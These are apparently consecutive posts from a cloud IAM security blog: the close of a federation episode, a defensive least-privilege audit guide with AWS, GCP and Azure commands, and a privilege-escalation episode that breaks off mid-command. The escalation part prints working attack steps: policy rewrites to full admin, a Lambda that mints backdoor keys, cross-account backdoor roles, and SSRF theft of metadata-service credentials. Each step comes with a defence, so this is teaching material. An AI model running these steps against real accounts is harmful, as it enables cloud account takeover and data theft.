  • In OIDC, the sub condition in trust policies is what prevents any workload from assuming any role — omitting it is a critical misconfiguration
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but they need correct configuration
  • The IdP is the trust anchor — its security posture bounds the security of every system that trusts it. Treat IdP admin access with the same controls as your most sensitive systems.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

What’s Next

EP11 brings this into Kubernetes — RBAC, service account tokens, and how the Kubernetes authorization layer interacts with cloud IAM. Two separate systems, both requiring security. A gap in either becomes a gap in both.

Next: Kubernetes RBAC and AWS IAM

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Reading Time: 10 minutes


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege Audit


TL;DR

  • The average IAM entity uses less than 5% of its granted permissions — the 95% excess is attack surface, not waste
  • AWS Access Analyzer generates a least-privilege policy from 90 days of CloudTrail data — use it on every Lambda role, ECS task role, and EC2 instance profile
  • GCP IAM Recommender surfaces specific right-sizing suggestions based on 90-day activity and tracks them until you act on them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build aws accessanalyzer validate-policy into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

The Big Picture

  THE LEAST PRIVILEGE AUDIT CYCLE

  ┌─────────────────────────────────────────────────────────────────┐
  │  1. INVENTORY  What identities exist, what policies attached?  │
  │  aws iam get-account-authorization-details                      │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  2. CLASSIFY  Group by purpose: human / CI-CD / app / data     │
  │  Expected permission profile per class — deviations are findings│
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  3. FIND UNUSED  Granted vs Used gap (average: 95% excess)     │
  │  AWS: Access Analyzer generated policy + last-accessed data     │
  │  GCP: IAM Recommender  │  Azure: Defender + Access Reviews     │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  4. RIGHT-SIZE  Replace wildcards with scoped permissions       │
  │  Remove unused services · pin resource ARNs · add conditions   │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  5. GUARD  Validate in CI/CD before any policy merges          │
  │  aws accessanalyzer validate-policy → fail pipeline if findings │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  6. MONITOR  Weekly: new findings  Quarterly: full review      │
  │  On offboarding: immediate direct-permission audit             │
  └───────────────────────────┬─────────────────────────────────────┘
                              │
                              └──────────────────── back to 1

The AWS least privilege audit tools covered in this episode map directly onto steps 3–5. The cycle is the practice.


Introduction

An AWS least privilege audit starts by measuring the gap between what each identity is granted and what it actually uses. Then it closes that gap with the tooling AWS, GCP, and Azure all provide natively. The numbers from real environments are consistently worse than teams expect.

Last year I audited an AWS account for an e-commerce company. They’d been running in production for three years. Eight engineers, two teams, a moderately complex microservices architecture. Reasonable people, competent engineers, no obvious security negligence.

When I ran the IAM Access Analyzer policy generation job against their 12 Lambda execution roles and waited for it to pull 90 days of CloudTrail data, here’s what I found:

The average Lambda role had 47 granted permissions. The average Lambda was actually using 6 of them over 90 days. That’s a utilization rate of roughly 13%. The other 87% — the 41 permissions nobody was using — sat there as silent attack surface.

The worst example was a Lambda that processed image thumbnails. Its role had AmazonS3FullAccess plus AmazonDynamoDBFullAccess plus AWSLambdaFullAccess. Someone had attached three AWS managed policies early in development to “make sure everything worked” and never came back to tighten it. The Lambda needed three permissions: s3:GetObject on one bucket, s3:PutObject on another, and logs:CreateLogGroup. That’s it. Instead it had s3:* on all S3, full DynamoDB including delete, and the ability to create and delete other Lambda functions.

If an attacker had exploited a vulnerability in that image processor — a malformed image, a dependency with a CVE — they’d have had full S3 access, full DynamoDB access, and the ability to backdoor other Lambda functions. Not because anyone intended that. Because “make it work first, fix it later” is how IAM configurations drift.

This episode is “fix it later.” The tools exist. The methodology is straightforward. The gap between knowing you should do this and actually doing it is usually not understanding the tooling.


The Fundamental Problem: Granted vs Used

The central insight of IAM auditing is simple: what an identity is granted and what it actually uses are rarely the same thing.

AWS has published data from their own customer environments: the average IAM entity uses less than 5% of the permissions it has been granted. That 95% excess is not wasted. It’s attack surface. Every permission that exists but isn’t needed is a permission an attacker can use if they compromise that identity.

The tools to close this gap exist on all three platforms. The difference between organizations that operate at low IAM risk and those that don’t is usually not knowledge. It’s the discipline of actually running these tools regularly and acting on what they find.


AWS IAM Auditing

Last Accessed Data — The Starting Point

AWS tracks when each service was last called by each IAM entity. This tells you which service permissions have never been used:

# Generate last-accessed data for a specific role
aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:role/LambdaImageProcessor

JOB_ID="..." # returned by the above command

# Poll until complete (usually 30-60 seconds)
aws iam get-service-last-accessed-details --job-id "${JOB_ID}"

# Parse: find services that were never called
aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | select(.TotalAuthenticatedEntities == 0) | .ServiceName'
# These services have never been accessed by this role — permissions can be removed

For finer granularity — which specific actions are used within a service:

aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:policy/AppServerPolicy \
  --granularity ACTION_LEVEL

aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | 
    select(.TotalAuthenticatedEntities > 0) |
    {service: .ServiceName, last_used: .LastAuthenticated}'

Access Analyzer — Generated Least-Privilege Policies

This is the tool I use most. It pulls 90 days of CloudTrail data for a role and generates a policy containing only the actions actually called:

# Start a policy generation job
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/LambdaImageProcessor"
  }' \
  --cloudtrail-details '{
    "trailArn": "arn:aws:cloudtrail:ap-south-1:123456789012:trail/management-events",
    "startTime": "2026-01-01T00:00:00Z",
    "endTime": "2026-04-01T00:00:00Z"
  }'

JOB_ID="..."
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

The output is a valid IAM policy document containing only what was called. Compare it against the current policy — the delta is everything that can be removed. I treat the generated policy as a starting point, not a final answer: occasionally a permission is needed but wasn’t exercised in the 90-day window (error handling paths, quarterly jobs, incident response capabilities). Review the generated policy against the function’s known requirements before applying it verbatim.

Access Analyzer also identifies external sharing you may not have intended:

# Find resources shared outside the account or organization
aws accessanalyzer create-analyzer \
  --analyzer-name account-analyzer \
  --type ACCOUNT

aws accessanalyzer list-findings \
  --analyzer-arn arn:aws:accessanalyzer:ap-south-1:123456789012:analyzer/account-analyzer \
  --filter '{"status":{"eq":["ACTIVE"]}}' \
  --output table
# Shows: S3 buckets, KMS keys, Lambda functions accessible from outside the account

And validates new policies before you apply them:

# Run this in CI/CD before any IAM policy gets merged
aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")'

# Exit non-zero if findings exist — fail the pipeline
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')
[ "$FINDINGS" -eq 0 ] || { echo "IAM policy has $FINDINGS security findings"; exit 1; }

CloudTrail for Targeted Investigation

When you need to understand what a specific role has been doing in detail:

# What API calls has LambdaImageProcessor made in the last 30 days?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=LambdaImageProcessor \
  --start-time "$(date -d '30 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output json | jq '.Events[] | {time:.EventTime, event:.EventName, source:.EventSource}'

# All IAM changes in the last 7 days — track who changed what
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventSource,AttributeValue=iam.amazonaws.com \
  --start-time "$(date -d '7 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output table

Open Source Tooling

For a more comprehensive scan across an account:

# Prowler — runs hundreds of checks including IAM-specific ones
pip install prowler
prowler aws --profile default --services iam --output-formats json html

# Key IAM checks:
# iam_root_mfa_enabled
# iam_user_no_setup_initial_access_key
# iam_policy_no_administrative_privileges
# iam_user_access_key_unused → finds keys unused for 90+ days
# iam_role_cross_account_readonlyaccess_policy

# ScoutSuite — multi-cloud auditor with a report UI
pip install scoutsuite
scout aws --profile default --report-dir ./scout-report

GCP IAM Auditing

IAM Recommender — Automated Right-Sizing

GCP’s IAM Recommender analyses 90 days of activity and surfaces specific suggestions: “replace roles/editor with roles/storage.objectViewer.” It tells you exactly what to change, not just that something needs changing:

# List IAM recommendations for a project
gcloud recommender recommendations list \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --format=json | jq '.[] | {
    principal: .description,
    current_role: .content.operationGroups[].operations[] | select(.action=="remove") | .path,
    suggested_role: .content.operationGroups[].operations[] | select(.action=="add") | .value
  }'

# Mark a recommendation as applied (required to track progress)
gcloud recommender recommendations mark-succeeded RECOMMENDATION_ID \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --etag ETAG

In practice, I run IAM Recommender across all GCP projects in a quarterly review. The recommendations don’t age out — GCP continues to track them until you address them or explicitly dismiss them. Dismissed without action counts as a decision; it should be documented.

Policy Analyzer — Answering Access Questions

When you need to understand who has access to a specific resource, and why:

# Who can access a specific BigQuery dataset?
gcloud policy-intelligence analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//bigquery.googleapis.com/projects/my-project/datasets/customer_analytics" \
  --output-partial-result-before-timeout

# What can a specific principal do in this project?
gcloud policy-intelligence analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//cloudresourcemanager.googleapis.com/projects/my-project" \
  --identity="serviceAccount:[email protected]"

Finding Public Exposure

# Org-wide scan for allUsers or allAuthenticatedUsers bindings
gcloud asset search-all-iam-policies \
  --scope=organizations/ORG_ID \
  --query="policy.members:allUsers OR policy.members:allAuthenticatedUsers" \
  --format=json | jq '.[] | {resource: .resource, policy: .policy}'

Run this in every new environment you inherit. The results reliably surface data exposure incidents waiting to happen — public GCS buckets, publicly readable BigQuery datasets, APIs exposed to any authenticated Google account.


Azure IAM Auditing

Defender for Cloud — Baseline Recommendations

# Get IAM-related security recommendations
az security assessment list --output table | grep -i -E "(identity|mfa|privileged|owner)"

# Check specific conditions:
# "MFA should be enabled on accounts with owner permissions on your subscription"
# "Deprecated accounts should be removed from your subscription"
# "External accounts with owner permissions should be removed from your subscription"

Azure Resource Graph — Bulk Role Assignment Queries

Azure Resource Graph lets you query RBAC assignments across the entire tenant in a single call — essential for large Azure estates:

# All role assignments — who has what, where
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| extend principalId = properties.principalId,
         roleId = properties.roleDefinitionId,
         scope = properties.scope
| project scope, principalId, roleId
| limit 500" \
--output table

# Find all Owner assignments at subscription scope — high-risk
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| where properties.roleDefinitionId endswith '8e3af657-a8ff-443c-a75c-2fe8c4bcb635'
| where properties.scope startswith '/subscriptions/'
| project scope, properties.principalId" \
--output table

Entra ID Access Reviews — Automated Re-Certification

Access reviews send notifications to resource owners or users asking them to confirm that access is still appropriate. When someone doesn’t respond — or responds “no” — the access is removed:

# Create a quarterly access review for subscription Owner assignments
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/identityGovernance/accessReviews/definitions" \
  --body '{
    "displayName": "Quarterly Subscription Owner Review",
    "scope": {
      "query": "/subscriptions/SUB_ID/providers/Microsoft.Authorization/roleAssignments",
      "queryType": "MicrosoftGraph"
    },
    "reviewers": [{"query": "/me", "queryType": "MicrosoftGraph"}],
    "settings": {
      "mailNotificationsEnabled": true,
      "justificationRequiredOnApproval": true,
      "autoApplyDecisionsEnabled": true,
      "defaultDecision": "Deny",          ← if no response, access is removed
      "instanceDurationInDays": 7,
      "recurrence": {
        "pattern": {"type": "absoluteMonthly", "interval": 3},
        "range": {"type": "noEnd"}
      }
    }
  }'

The defaultDecision: Deny setting is the key. Access reviews that default to preserving access on non-response don’t actually remove anything. They just document that nobody reviewed it. Defaulting to revocation means inaction removes access, which is the correct behavior for privileged roles.


The Hardening Workflow

The methodology I apply when auditing any cloud IAM configuration:

Step 1: Inventory Everything

You cannot audit what you don’t know exists.

# AWS: full IAM snapshot in one call
aws iam get-account-authorization-details --output json > iam-snapshot-$(date +%Y%m%d).json
# Contains: all users, groups, roles, policies, attachments — everything

# GCP: export all IAM-relevant assets
gcloud asset export \
  --project=my-project \
  --output-path=gs://audit-bucket/iam-snapshot-$(date +%Y%m%d).json \
  --asset-types="iam.googleapis.com/ServiceAccount,cloudresourcemanager.googleapis.com/Project"

Step 2: Classify by Function

Group identities by purpose: human engineering access, CI/CD pipelines, application workloads, data pipelines, monitoring/audit. Each class has an expected permission profile. Anything outside the expected profile for its class is a finding.

A Lambda function with iam:* is not in the expected profile for application workloads. An EC2 instance role with s3:DeleteObject on * deserves a question. A CI/CD pipeline role with secretsmanager:GetSecretValue warrants understanding what secrets it actually needs.

Step 3: Find Unused Permissions

Apply the tools:
– AWS: Access Analyzer generated policies + Last Accessed Data
– GCP: IAM Recommender
– Azure: Defender for Cloud recommendations + sign-in activity analysis

For any permission unused in 90 days: document whether it’s still needed (rare operation, incident response capability) or can be removed.

Step 4: Right-Size Policies

Replace broad permissions with specific ones:

// Before: attached AmazonS3FullAccess to a read-only service
{
  "Action": "s3:*",
  "Effect": "Allow",
  "Resource": "*"
}

// After: only what the service actually calls
{
  "Action": ["s3:GetObject", "s3:ListBucket"],
  "Effect": "Allow",
  "Resource": [
    "arn:aws:s3:::app-assets-prod",
    "arn:aws:s3:::app-assets-prod/*"
  ]
}

Every wildcard you remove is attack surface eliminated. Not conceptually — concretely.

Step 5: Add Conditions as Guardrails

Conditions constrain how permissions are used even when they can’t be removed:

// Require MFA for sensitive operations — applies across all roles in the account
{
  "Effect": "Deny",
  "Action": ["iam:*", "s3:Delete*", "ec2:Terminate*", "kms:*"],
  "Resource": "*",
  "Condition": {
    "BoolIfExists": { "aws:MultiFactorAuthPresent": "false" }
  }
}

// Restrict all non-service API calls to the corporate network
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "NotIpAddress": { "aws:SourceIp": ["10.0.0.0/8", "172.16.0.0/12"] },
    "Bool": { "aws:ViaAWSService": "false" }   // allow calls made through AWS services (e.g., Lambda calling S3)
  }
}

Step 6: Build It Into CI/CD

IAM configuration changes that aren’t reviewed before they reach production will drift. Make the validation automatic:

# Pre-merge check in CI — catches wildcards and dangerous permissions before they land
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://changed-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')

if [ "$FINDINGS" -gt 0 ]; then
  echo "❌ IAM policy has $FINDINGS security findings — see below"
  aws accessanalyzer validate-policy --policy-document file://changed-policy.json \
    --policy-type IDENTITY_POLICY | jq '.findings[]'
  exit 1
fi

Step 7: Schedule Regular Reviews

IAM audit is not a one-time project. Build a cadence:

  • Weekly: Access Analyzer findings, IAM Recommender dismissals, new cross-account trust relationships
  • Monthly: Unused access keys report, inactive service accounts
  • Quarterly: Access reviews for privileged roles, full policy inventory review
  • On offboarding: Immediate review of departing engineer’s direct permissions and any roles whose trust policies name them

Quick Wins Checklist

Check AWS GCP Azure
No active root / global admin credentials GetAccountSummaryAccountAccessKeysPresent: 0 N/A Check Entra ID conditional access
MFA on all human privileged accounts IAM Credential report Google 2FA enforcement Conditional Access policy
No inactive credentials older than 90 days Credential report LastRotated SA key age Entra ID sign-in activity
No policies with Action:* or Resource:* on write Access Analyzer validate N/A Azure Policy
No public-facing storage S3 Block Public Access constraints/storage.publicAccessPrevention Storage account public access disabled
Machine identities use roles, not static keys Audit for access key creation on roles iam.disableServiceAccountKeyCreation Use Managed Identity
Permissions verified against actual usage Access Analyzer generated policy IAM Recommender Defender for Cloud recommendations

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 6 — Security Assessment and Testing IAM auditing is a core cloud security assessment activity — finding over-permission before attackers do
CISSP Domain 7 — Security Operations Continuous IAM right-sizing is an operational discipline requiring tooling, cadence, and ownership
ISO 27001:2022 5.18 Access rights Periodic review of access rights — this episode is the practical implementation of that control
ISO 27001:2022 8.2 Privileged access rights Reviewing and right-sizing elevated permissions; detecting unused privileged access
ISO 27001:2022 8.16 Monitoring activities Continuous IAM monitoring, CloudTrail analysis, and automated anomaly detection
SOC 2 CC6.3 Access removal processes — Access Analyzer, IAM Recommender, and Access Reviews are the tooling for CC6.3
SOC 2 CC7.1 Threat and vulnerability identification — unused permissions are latent attack surface, identifiable and removable

Key Takeaways

  • The average cloud identity uses less than 5% of its granted permissions — the 95% excess is attack surface, not just waste
  • AWS Access Analyzer generates a least-privilege policy from CloudTrail data — run it on every Lambda role, ECS task role, and EC2 instance profile quarterly
  • GCP IAM Recommender surfaces role right-sizing suggestions based on 90-day activity — they don’t expire until you address them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build IAM policy validation into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

What’s Next

EP10 covers cross-system identity federation — OIDC, SAML, and the trust relationships that let a single IdP authenticate users and workloads across cloud platforms, SaaS applications, and organizational boundaries. Understanding how federation works is also understanding how it can be exploited when trust is too broad.

Next: SAML vs OIDC federation

Get EP10 in your inbox when it publishes → linuxcent.com/subscribe

AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Reading Time: 10 minutes


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege Escalation


TL;DR

  • Cloud breaches are IAM events — the initial compromise is just the door; the IAM configuration determines how far an attacker goes
  • iam:PassRole with Resource: * is AWS’s single highest-risk permission — it lets any principal assign any role to any service they can create
  • iam:CreatePolicyVersion is a one-call path to full account takeover — the attacker rewrites the policy that’s already attached to them
  • iam.serviceAccounts.actAs in GCP and Microsoft.Authorization/roleAssignments/write in Azure are direct equivalents — same threat model, different syntax
  • Enforce IMDSv2 on EC2; disable SA key creation in GCP; restrict role assignment scope in Azure
  • Alert on IAM mutations — they are low-volume, high-signal events that should never be silent

The Big Picture

  AWS IAM PRIVILEGE ESCALATION — HOW LIMITED ACCESS BECOMES FULL COMPROMISE

  Initial credential (exposed key, SSRF to IMDS, phished session)
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  DISCOVERY (read-only, often undetected)                        │
  │  get-caller-identity · list-attached-policies · get-policy     │
  │  Result: attacker maps their permission surface in < 15 min    │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PRIVILEGE ESCALATION — pick one path that's open:             │
  │                                                                 │
  │  iam:CreatePolicyVersion  →  rewrite your own policy to *:*    │
  │  iam:PassRole + lambda    →  invoke code under AdminRole       │
  │  iam:CreateRole +                                              │
  │    iam:AttachRolePolicy   →  create and arm a backdoor role    │
  │  iam:UpdateAssumeRolePolicy → hijack an existing admin role    │
  │  SSRF → IMDS              →  steal instance role credentials   │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PERSISTENCE (before incident response begins)                  │
  │  Create hidden IAM user · cross-account backdoor role          │
  │  Add personal account at org level (GCP)                       │
  │  These survive: password resets, key rotation, even            │
  │  deletion of the original compromised credential               │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  Impact: data exfiltration · destruction · ransomware · mining

AWS IAM privilege escalation follows a consistent pattern across almost every significant cloud breach: a limited initial credential, a chain of IAM permissions that expand access, and damage that’s proportional to how much room the IAM design gave the attacker to move. This episode maps the paths — as concrete techniques with specific permissions, because defending against them requires understanding exactly what they exploit.


Introduction

AWS IAM privilege escalation turns misconfigured permissions into full account compromise — and the entry point is rarely the attack that matters. In 2019, Capital One suffered a breach that exposed over 100 million customer records. The attacker didn’t find a zero-day. They exploited an SSRF vulnerability in a web application firewall, reached the EC2 instance metadata service, retrieved temporary credentials for the instance’s IAM role, and found a role with sts:AssumeRole permissions that let it assume a more powerful role. That more powerful role had access to S3 buckets containing customer data.

The SSRF got the attacker a foothold. The IAM design determined how far they could go.

This is the pattern across almost every significant cloud breach: a limited initial credential, followed by a privilege escalation path through IAM, followed by the actual damage. The damage is determined not by the sophistication of the initial compromise but by how much room the IAM configuration gives an attacker to move.

This episode maps the paths. Not as theory — as concrete techniques with specific permissions, because understanding exactly what an attacker can do with a specific IAM misconfiguration is the only way to prioritize what to fix. The defensive controls are listed alongside each path because that’s where they’re most useful.


The Attack Chain

Most cloud account compromises follow a consistent pattern:

Initial Access
  (compromised credential — exposed access key, SSRF to IMDS,
   compromised developer workstation, phished IdP session)
    │
    ▼
Discovery
  (what am I? what can I do? what can I reach?)
    │
    ▼
Privilege Escalation
  (use existing permissions to gain more permissions)
    │
    ▼
Lateral Movement
  (access other accounts, services, resources)
    │
    ▼
Persistence
  (create backdoor identities that survive credential rotation)
    │
    ▼
Impact
  (data exfiltration, destruction, ransomware, crypto mining)

Understanding this chain tells you where to put defensive controls. You can cut the chain at any link. The earlier the better — but it’s better to have multiple cuts than to assume a single control holds.


Phase 1: Discovery — An Attacker’s First Steps

The moment an attacker has any cloud credential, they enumerate. This is low-noise, uses only read permissions, and in many environments goes completely undetected:

# AWS: establish identity
aws sts get-caller-identity
# Returns: Account, UserId, Arn — tells the attacker what they're working with

# Enumerate attached policies
aws iam list-attached-user-policies --user-name alice
aws iam list-user-policies --user-name alice
aws iam list-groups-for-user --user-name alice
aws iam list-attached-role-policies --role-name LambdaRole

# Read the actual policy document
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevAccess \
  --version-id v1

# Survey what's accessible
aws s3 ls
aws ec2 describe-instances --output table
aws secretsmanager list-secrets
aws ssm describe-parameters
# GCP: establish identity and permissions
gcloud auth list
gcloud projects get-iam-policy PROJECT_ID --format=json | \
  jq '.bindings[] | select(.members[] | contains("[email protected]"))'

# Test specific permissions
gcloud projects test-iam-permissions PROJECT_ID \
  --permissions="storage.objects.list,iam.roles.create,iam.serviceAccountKeys.create"
# Azure: establish context
az account show
az role assignment list --assignee [email protected] --all --output table

All of this is read-only. In most environments I’ve reviewed, there are no alerts on this activity unless the calls come from an unusual IP or at an unusual time. An attacker comfortable with the AWS CLI can map the permission surface of a compromised credential in 10–15 minutes.


AWS Privilege Escalation Paths

Path 1: iam:CreatePolicyVersion

The most direct path. If a principal can create a new version of a policy attached to themselves, they can rewrite it to grant anything.

# Attacker has iam:CreatePolicyVersion on a policy attached to their own role
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
  }' \
  --set-as-default
# Result: DevPolicy now grants AdministratorAccess to everyone with it attached

The attacker doesn’t need to create new infrastructure. They inject admin access directly into their existing permission set. This is often undetected by basic monitoring because CreatePolicyVersion is a low-frequency legitimate operation.

Defence: Alert on every CreatePolicyVersion call. Restrict the permission to a dedicated break-glass IAM role. Use permissions boundaries on developer roles to cap the maximum permissions they can ever hold.

Path 2: iam:PassRole + Service Creation

iam:PassRole allows an identity to assign an IAM role to an AWS service. This is legitimate and necessary — it’s how you configure “this Lambda function runs with this role.” The attack vector: if a more powerful role exists in the account, and the attacker can pass it to a service they control and invoke that service, they operate with the more powerful role’s permissions.

# Attacker has: lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
# They know an existing AdminRole exists (discovered during enumeration)

# Create a Lambda that runs with AdminRole
aws lambda create-function \
  --function-name exfil-fn \
  --runtime python3.12 \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

# Invoke — code now executes with AdminRole's permissions
aws lambda invoke --function-name exfil-fn /tmp/output.json
import boto3

def handler(event, context):
    # Running as AdminRole
    s3 = boto3.client('s3')
    buckets = s3.list_buckets()

    # Create a backdoor access key while we have elevated access
    iam = boto3.client('iam')
    key = iam.create_access_key(UserName='backdoor-user')

    return {"buckets": [b['Name'] for b in buckets['Buckets']], "key": key}

Defence: Scope iam:PassRole to specific role ARNs — never Resource: *. Example:

{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"
}

Path 3: iam:CreateRole + iam:AttachRolePolicy

If an attacker can both create a role and attach policies to it, they create a backdoor identity:

# Create a role with a trust policy naming an attacker-controlled principal
aws iam create-role \
  --role-name BackdoorRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'

# Attach AdministratorAccess
aws iam attach-role-policy \
  --role-name BackdoorRole \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Assume it from the attacker's account — persistent cross-account access
aws sts assume-role \
  --role-arn arn:aws:iam::TARGET_ACCOUNT:role/BackdoorRole \
  --role-session-name persistent-access

This is persistence, not just escalation — the backdoor survives password resets, access key rotation, even deletion of the original compromised credential.

Path 4: iam:UpdateAssumeRolePolicy

If an existing high-privilege role already exists, modifying its trust policy to allow the attacker’s principal is faster and quieter than creating a new role:

# Add attacker's principal to the trust policy of an existing AdminRole
aws iam update-assume-role-policy \
  --role-name ExistingAdminRole \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
      {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"}
    ]
  }'

The original entry remains intact. A casual review might miss the addition. Trust policy changes should be critical-priority alerts.

Path 5: SSRF to EC2 Instance Metadata

The Capital One path. Any SSRF vulnerability in a web application running on EC2 can retrieve the instance role’s credentials from the metadata service:

Attacker → SSRF → GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ Returns role name
→ GET http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
→ Returns: AccessKeyId, SecretAccessKey, Token (valid up to 6 hours)

Defence: IMDSv2 requires a PUT request first, blocking simple GET-based SSRF:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {"ec2:MetadataHttpTokens": "required"}
  }
}

High-Risk AWS Permissions Reference

Permission Why It’s Dangerous
iam:PassRole with Resource: * Assign any role to any service — enables immediate privilege escalation
iam:CreatePolicyVersion Rewrite any policy to grant anything — full account takeover in one API call
iam:AttachRolePolicy Attach AdministratorAccess to any role
iam:UpdateAssumeRolePolicy Add any principal to any role’s trust policy
iam:CreateAccessKey on other users Create persistent credentials for any IAM user
lambda:UpdateFunctionCode on privileged Lambda Inject malicious code into an elevated function
secretsmanager:GetSecretValue with Resource: * Read every secret in the account
ssm:GetParameter with Resource: * Read all Parameter Store values — often contains credentials
iam:CreateRole + iam:AttachRolePolicy Create and arm a backdoor role

GCP Privilege Escalation Paths

iam.serviceAccounts.actAs

GCP’s equivalent of iam:PassRole — and broader. Allows an identity to make any GCP service act as a specified service account:

# Attacker has iam.serviceAccounts.actAs on an admin SA
gcloud --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com \
  iam roles list --project=my-project

# Generate a full access token and call any GCP API as admin-sa
gcloud auth print-access-token \
  --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com

iam.serviceAccountKeys.create

Converts a short-lived identity into a persistent one. Create a key for an admin service account and you have indefinite access:

gcloud iam service-accounts keys create admin-key.json \
  [email protected]
# Valid until explicitly deleted — no expiry by default

# Block this at org level
gcloud org-policies set-policy --organization=ORG_ID - << 'EOF'
name: organizations/ORG_ID/policies/iam.disableServiceAccountKeyCreation
spec:
  rules:
    - enforce: true
EOF

Azure Privilege Escalation Paths

Microsoft.Authorization/roleAssignments/write

If an identity can write role assignments, it can grant itself Owner at any scope it can write to:

az role assignment create \
  --assignee [email protected] \
  --role "Owner" \
  --scope /subscriptions/SUB_ID

Managed Identity Assignment

Attach a high-privilege managed identity to a VM the attacker controls, then retrieve its token via IMDS:

az vm identity assign \
  --name attacker-vm --resource-group rg-attacker \
  --identities /subscriptions/SUB/resourcegroups/rg-prod/providers/\
Microsoft.ManagedIdentity/userAssignedIdentities/admin-identity

# From inside the VM
curl 'http://169.254.169.254/metadata/identity/oauth2/token\
?api-version=2018-02-01&resource=https://management.azure.com/' \
  -H 'Metadata: true'

Persistence — How Attackers Outlast Incident Response

# AWS: hidden IAM user with admin access
aws iam create-user --user-name svc-backup-01
aws iam attach-user-policy \
  --user-name svc-backup-01 \
